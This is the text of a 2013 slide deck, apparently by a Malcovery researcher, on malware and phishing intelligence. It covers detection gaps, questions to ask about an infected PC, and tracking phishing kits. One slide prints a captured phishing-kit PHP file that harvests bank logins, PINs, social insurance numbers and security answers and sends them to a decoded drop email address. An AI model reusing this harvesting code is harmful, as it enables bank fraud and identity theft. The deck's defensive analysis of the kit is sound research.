CONFIDENTIAL 1

Malware & Phishing Intelligence

CONFIDENTIAL 2

Agenda:Malware – “re-image vs. intelligence”Phishing – “takedown vs. intelligence”

CONFIDENTIAL 3

What do you do with an Infected PC?

“Our policy is to re-image the computer. No questions. No exceptions.”

• Does that sound familiar?

• We hear the argument that this is the “safest” option.

• What’s the worst that can happen?

CONFIDENTIAL 4

What is your Worst Case Scenario?

Global Thermonuclear War?

CONFIDENTIAL 5

What is your Worst Case Malware Scenario?

Data breach involving Intellectual Property?Direct Financial Loss?

Data Breach Involving PII?

CONFIDENTIAL 6

Verizon 2013 Data Breach Investigations ReportStudy of 47,000 security incidents with 621 confirmed data breaches: 40% of all data breaches were caused by malware. 47% of those malware attacks originated with an E-mail attachment

In “Large Enterprises” – 63% of malware attacks originated with an Email attachment.

http://www.verizonenterprise.com/DBIR/2013/

“Keep in mind that these vectors are not mutually exclusive. In many cases, an actor may gain initial entry using a malicious e-mail attachment, and then install additional malware on that and other systems throughout the environment.”

CONFIDENTIAL 7

The inevitable Click

• How many emails do I have to send your employees to get someone to click on it?

• Three = 50% chance. Ten = “Guaranteed”

ThreatSim.com Quoted in Verizon DBIR

CONFIDENTIAL 8

Recent Threats

CONFIDENTIAL 9

Top malicious spam of August 5, 2013

CONFIDENTIAL 10

typical

This is what the AV detection looked like for Tuesday morning’s top malicious spam campaign.

Four hours into the campaign, detection 2/46.

CONFIDENTIAL 11

Same malware, 13 hours later• Detection rate now 17 vendors detecting

CONFIDENTIAL 12

ATTACK!Now what if AFTER all of that happens, we now realize the email had malware in it, and we send a PC tech to format BlueGuy’s machine?

TOP SECRET

CONFIDENTIAL 13

Long Detect Times• Mandiant reported in “M-Trends 2013: Attack

the Security Gap” that THE MEDIAN NUMBER OF DAYS from evidence of compromise to discovery of compromise was 243 DAYS!

• General Keith Alexander told an audience at Georgia Tech “Most of the folks who get into the networks are in there for six- to nine months before they’re discovered.

• M-Trends 2013: Attack the Security Gap™, https://www.mandiant.com/resources/m-trends/ March 2013.• Prince, Brian, “NSA Director: Information-Sharing Critical to U.S. Cybersecurity”,

www.darkreading.com/government-vertical/nsa-director-information-sharing-critica/240151955. March 29, 2013

CONFIDENTIAL 14

Malware Intelligence1. What CAN THIS MALWARE DO?2. Where did it come from?

a) What was the initial attack vector?b) Has that vector contacted any other resource?

3. What does this computer HAVE ACCESS TO?4. What has the infected computer DONE?

a) Has the infected computer received additional files?

b) Has the infected computer exfiltrated data?c) Are there any new accounts or files since infection?d) Has the infected computer exceeded or attempted

to exceed authority on any internal resources?

CONFIDENTIAL 15

Today’s Top Threat

• Each day we document the behavior of the Top Threat emails– What is the spam subject?– What hostile URLs are advertised?– What hostile attachments are present?– What network touches does the malware make?– What additional malware drops if executed?

CONFIDENTIAL 16

Cyber Intelligence?

“The acquisition and analysis of information to identify, track, and predict cyber capabilities, intentions, and activities that offer courses of action to enhance decision making.”

http://www.sei.cmu.edu/library/assets/whitepapers/citp-summary-key-findings.pdf

CONFIDENTIAL 17

Phishing Intelligence

CONFIDENTIAL 18

http://www.go-polymers.com/components/rbc/index.phpFebruary 27, 2013

CONFIDENTIAL 19

http://www.go-polymers.com/flash/hsbc.com.bh12idv/Authentication/idv.Authentication.htm

February 27, 2013

CONFIDENTIAL 20

http://www.go-polymers.com/admin/authentication.bns_Scotiabank/

authentication.bns.htm

February 22, 2013

CONFIDENTIAL 21

Phishing Timeline (Takedown View)

• GOAL: Protect customer credentials by improving Takedown speed. Time is Money.

CONFIDENTIAL 22

Phishing Clusters• For a single brand, we present the various

phishing clusters seen against that brand.• Phishing sites in the same cluster are composed

of highly similar files.

CONFIDENTIAL 23

Trend Analysis• By using the Conditional Formatting feature in

i2, we can identify “emerging threats”.

In this Conditional Formatting layout, phishing sites that were found in the current month are turned red and enlarged, while older phish are “greyed out”.

CONFIDENTIAL 24

Phishing Kits

Phishing sites are usually made by hacking an existing website and uploading a set of files necessary to create the look and feel of the brand being imitated.

Action files, usually with a .PHP extension, handle the business of sending the stolen data to the criminal via an email message.

When a criminal has a kit that proves successful, they tend to re-use the kit until something stops them.

CONFIDENTIAL 25

Confirm.php<?php$ip = $_SERVER['REMOTE_ADDR'];$user = $_POST['user'];$pass = $_POST['pass'];$q1 = $_POST['q1'];$a1 = $_POST['a1'];$q2 = $_POST['q2'];$a2 = $_POST['a2'];$q3 = $_POST['q3'];$a3 = $_POST['a3'];$sin1 = $_POST['sin1'];$sin2 = $_POST['sin2'];$sin3 = $_POST['sin3'];$dobd = $_POST['dobd'];$dobm = $_POST['dobm'];$doby = $_POST['doby'];$dl = $_POST['dl'];$issue = $_POST['issue'];$pin = $_POST['pin'];$email = $_POST['email'];$emailp = $_POST['emailp'];

$data ="--------- G00dLuck ---------User: $userPass: $pass-----Q1: $q1A1 $a1Q2: $q2A2 $a2Q3: $q3A3 $a3----Dob: $dobd - $dobm - $dobySIN : $sin1 - $sin2 - $sin3Dl : $dl Pin: $pin Issue: $issueE-mail: $email / $emailp--Ip: $ip--------- G00dLuck ---------";$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t'); $emailusr2 = base64_decode('');

$subj="RBC # $user - $pass - $doby - $dl";

$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');

Which decodes to: sofotex2@gmail.com

CONFIDENTIAL 26

Overlaying Drop Email data

• Each red point indicates a criminal’s email.• More lines = more phishing sites for that email.

CONFIDENTIAL 27

Phishing Timeline (Intelligence View)GOAL: Drive Major Criminals Away from OUR BRAND

CONFIDENTIAL 28

phishiq.com/submit• We’re always

looking for new sources of phishing or spam data.

• An online form is available, but feel free to contact if you are a “high volume” contributor.

CONFIDENTIAL 29

Thank you!Let’s discuss . . .

Gary Warnerwww.malcovery.com@garwarner@malcovery

CONFIDENTIAL 30

Additional Discussion points . . .

CONFIDENTIAL 31

Infected machine• Sensitive Data Inventory• What data was ON the machine?• What data could be ACCESSED FROM the machine?• Was it accessed? Did it leave?

• Are there additional user accounts?• What programs / files / DLLs have been added that

are not “company standard” in the last 90 days• Did this computer attempt any unusual internal

resource logins or accesses?• (rate / userid / time of day / day of week)

CONFIDENTIAL 32

Best Case Scenario• Malware was detected today• A clear source of infection is readily identifiable

from today• Only a single “unexplained” EXE or DLL is found

on the machine, and it matches the signature• The malware is well understood, widely

detected, and has a clear and limited purpose

CONFIDENTIAL 33

Our Porous Perimeters• Is the machine mobile?• Is it “forced VPN” back to our organization?• If mobile, and if unlimited access – we don’t

know what it did at or outside the perimeter because we don’t control the perimeter

• Home network, Starbucks wifi, hotel wifi – data exfil could occur in places where we don’t monitor the network